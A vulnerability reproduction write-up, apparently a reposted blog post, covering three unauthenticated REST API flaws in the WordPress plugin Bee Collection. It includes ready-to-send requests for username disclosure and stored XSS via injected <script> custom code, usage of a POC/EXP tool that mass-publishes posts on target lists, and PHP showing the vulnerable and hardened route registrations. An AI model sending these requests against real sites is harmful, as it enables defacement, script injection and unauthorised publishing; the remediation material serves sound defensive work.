
Reproducing the latest (2022-2-16) vulnerabilities in the WordPress plugin Bee Collection (XSS, WordPress username exposure, arbitrary article publishing)

2022-06-25 21:25:00 Deng_ Xian_ Sheng

This vulnerability concerns a WordPress article-collection (scraping) plugin, Bee Collection: none of the APIs that implement the plugin's functions perform any authentication, so a request sent by anyone is executed.

Download the vulnerability reproduction environment: https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA (extraction code: wwi7)

Partial POC and EXP: https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP

Download the environment and unzip "WordPress Plug in bee collection reproduction environment .zip".
Set up the environment according to its README.md; the steps are not repeated here.

Vulnerability 1

WordPress username exposure
The plugin's collection page is shown in the figure below.
The API that fetches page information is not restricted, so an attacker can obtain the WordPress username and other information.
Open the browser's element inspector and refresh the page to see the POST request.
Then copy the request URL and request body into a testing tool:

URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}

As you can see, the information is returned without any authentication.

Vulnerability 2

XSS attack
The plugin's "Custom code" page is likewise unauthenticated, so custom code can be viewed and added freely.
Use the testing tool to send a request and observe the result:

# View custom code 
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}

This returns the content of the custom code (empty here, because no custom code has been added yet).

# Add custom code 
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{
    "action": "save",
    "data": [
        {
            "title": "testCode",
            "content": "<script>alert(\" I'm dengwenyi , I am in Shenzhen, Guangdong !\")</script>\n<h1> I'm dengwenyi , I am in Shenzhen, Guangdong !</h1>",
            "status": "on",
            "position": "head"
        }
    ]
}

As you can see, the custom code was added successfully, and the page now reflects it.
Note: I like that phrase a lot and wanted to put it in the page; don't be alarmed, it is harmless.

Vulnerability 3

Arbitrary article publishing
This reproduction relies on the download link under "Partial POC and EXP" above.
See the Golang code and the GitHub repository's README.md for the specific implementation.

Here we simply download the executable compiled by the author and use it directly.
Download the executable:

Create a folder and put the executable in it, because the tool writes logs to the directory it is run from.
-h shows the usage:
A brief explanation of the options:

--IP    The IP address of your Kali machine
--Port  A port on your Kali machine; any port that is not already in use
--Type  'POC' or 'EXP'; default POC

--PayloadForTitle and --PayloadForMain
Fill in either one or both. These are the payloads used when --Type is EXP: PayloadForTitle is the title of the published post, PayloadForMain is the body of the published article. When --Type is POC they can be omitted. Payload values may also be given as a file path.

--PageType  The publishing type, i.e. whether the WordPress content is an article or a page; default 'Article'; 'Page' can also be given.

--ET  The penetration target. If omitted, the tool runs in interactive mode; if given, it runs in automatic mode. Only a file path is supported; targets in the file are separated by ',', for example:
192.168.0.1,192.168.0.2,192.168.0.3

Let's use interactive mode to test whether the vulnerability exists:

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 

This enters interactive mode; type -h at the prompt for help.
Briefly:

--ET  The penetration target; targets are separated by ',', for example:
192.168.0.1,192.168.0.2,192.168.0.3

Close  Exits interactive mode

The vulnerability is found, as shown below:

-ET 192.168.8.6:8080

End the POC, then add the EXP parameters and test the EXP:

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle  I'm dengwenyi , I am in Shenzhen, Guangdong  --PayloadForMain  I'm dengwenyi , I am in Shenzhen, Guangdong 

The penetration succeeded:
Checking WordPress confirms that an article was indeed added.
After exiting the EXP, we see that many log files were generated in the current directory; they record the penetration.

Suggestions for fixing the vulnerability

Temporarily disabling the plugin avoids being affected by this vulnerability.
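Disabling the plugin is a stop-gap; the lasting fix is to require authentication and a capability check on every route the plugin registers. The following PHP is an added illustrative example written for this write-up, not the plugin's own code: it registers the two routes seen in the requests above, `wp-beebox/v1/crawler` and `wp-beebox/v1/code`, first in the form that produces the unauthenticated behaviour (a `permission_callback` that accepts every request) and then in a hardened form. The handler names `beebox_handle_crawler` and `beebox_handle_code` and the choice of capabilities are assumptions; the route for publishing posts used by Vulnerability 3 is not named on this page, so it is not shown, but the same pattern with `current_user_can( 'publish_posts' )` applies to it.

```php
<?php
// Added illustrative example (not the plugin's own code). Route namespace and
// route names come from the requests in the write-up; handler names
// (beebox_handle_*) and capability choices are assumptions.

// --- Vulnerable pattern: the permission callback accepts every request, so
// --- unauthenticated visitors can fetch and save the "custom code".
add_action( 'rest_api_init', function () {
    register_rest_route( 'wp-beebox/v1', '/code', array(
        'methods'             => 'POST',
        'callback'            => 'beebox_handle_code',
        'permission_callback' => '__return_true', // anyone, logged in or not
    ) );
} );

// --- Hardened pattern: a capability check per route and per action.
add_action( 'rest_api_init', function () {
    // get_config on the crawler route reveals the WordPress user name, so only
    // administrators may read it.
    register_rest_route( 'wp-beebox/v1', '/crawler', array(
        'methods'             => 'POST',
        'callback'            => 'beebox_handle_crawler',
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );

    // Saving custom code injects raw HTML/JS into the <head> of every page,
    // which is the same power as the 'unfiltered_html' capability, so only
    // users who already hold that capability may save; reading it is limited
    // to administrators.
    register_rest_route( 'wp-beebox/v1', '/code', array(
        'methods'             => 'POST',
        'callback'            => 'beebox_handle_code',
        'permission_callback' => function ( WP_REST_Request $request ) {
            $action = $request->get_param( 'action' );
            if ( 'fetch' === $action ) {
                return current_user_can( 'manage_options' );
            }
            if ( 'save' === $action ) {
                return current_user_can( 'unfiltered_html' );
            }
            return new WP_Error( 'rest_forbidden', 'Unknown action.', array( 'status' => 403 ) );
        },
        // Reject bodies whose action is not one of the two known values
        // before the callback ever runs.
        'args' => array(
            'action' => array(
                'required' => true,
                'type'     => 'string',
                'enum'     => array( 'fetch', 'save' ),
            ),
        ),
    ) );
} );
```

Two caveats a practitioner will run into: since WordPress 5.5, `register_rest_route` emits a `_doing_it_wrong` notice when `permission_callback` is omitted, so a missing callback shows up in debug logs and is worth searching for in any plugin under review; and WordPress treats a cookie-authenticated REST request as logged in only when it carries a valid `X-WP-Nonce` header (created with `wp_create_nonce( 'wp_rest' )`), so the plugin's own admin JavaScript must send that header once these checks are in place, otherwise `current_user_can` sees an anonymous user and the plugin's legitimate requests are refused as well.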

Note: this test was conducted in a safe environment, and all code is limited to running in the reproduction environment. Do not maliciously tamper with the code or run it outside the test environment; otherwise you bear the consequences yourself!


Copyright notice
This article was created by [Deng_ Xian_ Sheng]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/02/202202181327252875.html